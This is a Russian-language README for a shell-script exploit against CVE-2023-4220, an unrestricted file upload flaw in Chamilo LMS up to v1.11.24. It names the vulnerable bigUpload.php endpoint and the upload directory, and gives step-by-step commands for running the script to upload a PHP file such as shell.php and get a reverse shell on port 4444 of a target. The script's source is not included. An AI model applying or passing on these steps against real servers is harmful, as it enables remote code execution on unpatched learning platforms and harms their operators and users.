
Эксплойт на основе Shell для CVE-2023-4220, нацеленный на неограниченную загрузку файлов в Chamilo LMS. Загружает произвольные файлы для выполнения обратных оболочек на уязвимых экземплярах.
Этот эксплойт демонстрирует уязвимость неограниченной загрузки файлов в Chamilo-LMS. Уязвимость затрагивает функциональность загрузки больших файлов, расположенную по адресу:
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
Подверженные версии: Chamilo LMS <= v1.11.24
Уязвимость позволяет загружать произвольные файлы в:
/main/inc/lib/javascript/bigupload/files/
Сначала сделайте эксплойт исполняемым и просмотрите информацию об использовании:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
Запустите эксплойт с необходимыми параметрами:
./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
Проверьте загруженный файл по адресу:
http://target.test/main/inc/lib/javascript/bigupload/files/
-f: Укажите файл для загрузки-h: URL целевого хоста-p: Номер порта для подключения./CVE-2023-4220.sh -f shell.php -h http://target.test -p 4444
Уязвимость существует в механизме загрузки файлов Chamilo LMS, который не выполняет надлежащей проверки загружаемых файлов в функциональности загрузки больших файлов.
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
/main/inc/lib/javascript/bigupload/files/